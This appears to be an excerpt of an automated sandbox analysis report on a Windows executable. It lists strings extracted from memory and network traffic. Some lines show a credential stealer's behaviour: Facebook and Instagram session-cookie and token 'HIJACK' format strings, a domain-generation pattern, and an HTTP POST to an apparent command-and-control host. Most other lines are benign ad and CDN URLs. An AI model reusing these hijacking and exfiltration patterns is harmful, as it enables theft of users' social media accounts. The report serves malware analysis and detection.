Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknown
DNS traffic detected: queries for: c41676c07a61a961.com

Source: unknown
HTTP traffic detected:
POST //fine/send HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 79
Host: 9a3a97f6f45f2c2b.com
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvrrg.img?h=166&w=310
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yHSm.img?h=75&w=100
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yqHP.img?h=75&w=100
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: ecv953D.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.2.drString found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.2.drString found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: download_engine.dll.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: download_engine.dll.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: download_engine.dll.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.276824908.0000000003300000.00000004.00000001.sdmpString found in binary or memory: http://www.interestvideo.com/video1.php
Source: ecv953D.tmp.9.drString found in binary or memory: http://www.msn.com
Source: ecv953D.tmp.9.drString found in binary or memory: http://www.msn.com/
Source: ecv953D.tmp.9.drString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecv953D.tmp.9.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecv953D.tmp.9.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecv953D.tmp.9.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1615173766196.exe, 00000009.00000002.277078839.0000000000198000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
Source: 1615173766196.exe, 1615173766196.exe.2.drString found in binary or memory: http://www.nirsoft.net/
Source: download_engine.dll.2.drString found in binary or memory: http://www.openssl.org/support/faq.html
Source: download_engine.dll.2.drString found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: download_engine.dll.2.drString found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.2.drString found in binary or memory: http://www.xunlei.com/GET
Source: 83C12B0D0FA88B10.exeString found in binary or memory: http://www.youtube.com
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.263407616.0000000003EF2000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com&#J$
Source: ecv953D.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: ecv953D.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: ecv953D.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.306952619.0000000002F45000.00000004.00000040.sdmpString found in binary or memory: https://7411B26051C176C0.xyz/
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.306952619.0000000002F45000.00000004.00000040.sdmpString found in binary or memory: https://7411B26051C176C0.xyz/K
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.284835796.00000000006E7000.00000004.00000001.sdmp, Localwebdata1615173777790.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 83C12B0D0FA88B10.exe, 83C12B0D0FA88B10.exe, 00000004.00000003.270705708.0000000003F1A000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.266586858.0000000003F38000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecv953D.tmp.9.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: ecv953D.tmp.9.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: ecv953D.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecv953D.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecv953D.tmp.9.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 83C12B0D0FA88B10.exe, 83C12B0D0FA88B10.exe, 00000004.00000003.270705708.0000000003F1A000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.266586858.0000000003F38000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: ecv953D.tmp.9.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecv953D.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecv953D.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecv953D.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecv953D.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecv953D.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecv953D.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecv953D.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecv953D.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecv953D.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecv953D.tmp.9.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecv953D.tmp.9.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.284835796.00000000006E7000.00000004.00000001.sdmp, Localwebdata1615173777790.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.271498084.0000000003EF0000.00000004.00000001.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.263989469.0000000003F84000.00000004.00000001.sdmp, background.js.4.drString found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 83C12B0D0FA88B10.exeString found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.264140582.0000000003EFE000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.270705708.0000000003F1A000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx)
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.270906477.0000000000946000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx7170
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.263407616.0000000003EF2000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxK1
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.270705708.0000000003F1A000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxy
Source: 83C12B0D0FA88B10.exe, 83C12B0D0FA88B10.exe, 00000004.00000003.270705708.0000000003F1A000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.266586858.0000000003F38000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
Source: ecv953D.tmp.9.drString found in binary or memory: https://contextual.media.net/
Source: ecv953D.tmp.9.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecv953D.tmp.9.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecv953D.tmp.9.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
Source: ecv953D.tmp.9.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecv953D.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecv953D.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311356783.0000000003200000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.276824908.0000000003300000.00000004.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecv953D.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/2/57/35/144/83ebc513-f6d1-4e0e-a39a-bef975147e85.jpg?v=9
Source: ecv953D.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9
Source: ecv953D.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
Source: ecv953D.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/3/248/152/169/520bb037-5f8d-42d6-934b-d6ec4a6832e8.jpg?v=9
Source: ecv953D.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x194/2/138/47/25/3b2da2d4-7a38-47c3-b162-f33e769f51f5.jpg?v=9
Source: ecv953D.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecv953D.tmp.9.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecv953D.tmp.9.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.264140582.0000000003EFE000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.264140582.0000000003EFE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.264140582.0000000003EFE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.263407616.0000000003EF2000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appnuA
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.264140582.0000000003EFE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settings
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.263407616.0000000003EF2000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settings51iB
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.284835796.00000000006E7000.00000004.00000001.sdmp, Localwebdata1615173777790.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.284835796.00000000006E7000.00000004.00000001.sdmp, Localwebdata1615173777790.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.284835796.00000000006E7000.00000004.00000001.sdmp, Localwebdata1615173777790.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://hellojackma%04d%02d.com/hellojackma%04d%02d1.com/helloja
Source: 83C12B0D0FA88B10.exe, 83C12B0D0FA88B10.exe, 00000004.00000003.270705708.0000000003F1A000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.266586858.0000000003F38000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: ecv953D.tmp.9.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 83C12B0D0FA88B10.exe, 83C12B0D0FA88B10.exe, 00000004.00000003.270705708.0000000003F1A000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.266586858.0000000003F38000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: ecv953D.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecv953D.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecv953D.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
